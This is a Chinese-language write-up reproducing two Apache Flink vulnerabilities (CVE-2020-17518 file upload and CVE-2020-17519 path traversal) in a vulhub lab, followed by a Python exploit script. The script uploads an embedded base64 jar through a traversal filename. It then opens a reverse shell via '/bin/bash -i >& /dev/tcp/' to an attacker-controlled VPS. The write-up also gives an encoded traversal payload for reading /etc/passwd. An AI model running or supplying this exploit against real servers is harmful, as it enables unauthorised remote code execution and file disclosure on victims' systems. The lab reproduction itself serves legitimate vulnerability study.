复现apache Flink(CVE-2020-17518/17519)附getShell EXP

安装环境

CVE-2020-17518

1.拉取vulhub环境（github搜vulhub自己下）
2.进入目录

cd vulhub/flink/CVE-2020-17518

3.启动环境

docker-compose up -d

通过浏览器访问http:your-ip:8081界面如下

4.点击Add new按钮抓包
5.进入docker环境，查看是否创建成功

docker ps
docker exec -it "docker ID" /bin/bash
cd /tmp

6.复现成功

CVE-2020-17519

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%
252f..%252f..%252f..%252f..%252fetc%252fpasswd

发包
也可直接在页面操作
点击 进入http://your-ip:8081//jobmanager/logs是一个json界面

在后面加入

..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

获取之前上传的success123文件

关闭docker环境

docker-compose down -v

getshellexp

基于python3，代码写的比较粗糙，大佬绕道。

import requests
import base64
import argparse
def main():
    post = 8888
    my_parser=argparse.ArgumentParser()
    my_parser.add_argument('--url',action = 'store',help="普通用法:python3 FlinkGetshell.py --url http://xxxx:8081")
    my_parser.add_argument('--server',action = 'store',help="getshell用法:先在自己vps监听"+str(post)+"端口然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
    parse=my_parser.parse_args()
    ## 懒的自己打包,直接用的别人base64编码过得jar
    jarBase64="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA"
    baseUrl=parse.url
    # if sys.argv[1]!="--url":
    #     print("poc用法:python3 FlinkGetshell.py --url http://xxxxx:8081")
    #     print("getshell用法:先在自己vps监听"+str(post)+"端口 ")
    #     print("然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
    #     exit()
    # 获取web.tmpdir的路径
    runDir=requests.get(baseUrl+"/jobmanager/config").json()
    for i in runDir:
        if i["key"]=="web.tmpdir":
            tmpdir=i["value"]

    #上传jar包
    jar=base64.b64decode(jarBase64)
    with open("fuck.jar","wb") as f:
        f.write(jar)
    files={
     
        "jarfile":('../../../../../..%s/flink-web-upload/fuck.jar' % tmpdir, open("fuck.jar",'rb'))
    }
    upload=requests.post(baseUrl+"/jars/upload",files=files,timeout=30,verify=False)
    print('the shell:%s/jars/fuck.jar/run?entry-class=Execute&program-args="command"' % baseUrl)
## getshell 
    if(parse.server!=None):
        print("请先在服务器上监听"+str(post)+"端口")
        getshell=requests.post(baseUrl+"/jars/new2.jar/run?entry-class=Execute&program-args='/bin/bash+-i+>%26+/dev/tcp/{}/{}+0>%261'".format(parse.server,post))
        print("如果没有getshell成功，请在执行一遍")
if __name__=="__main__":
    main()

最后

思路来自
网址在这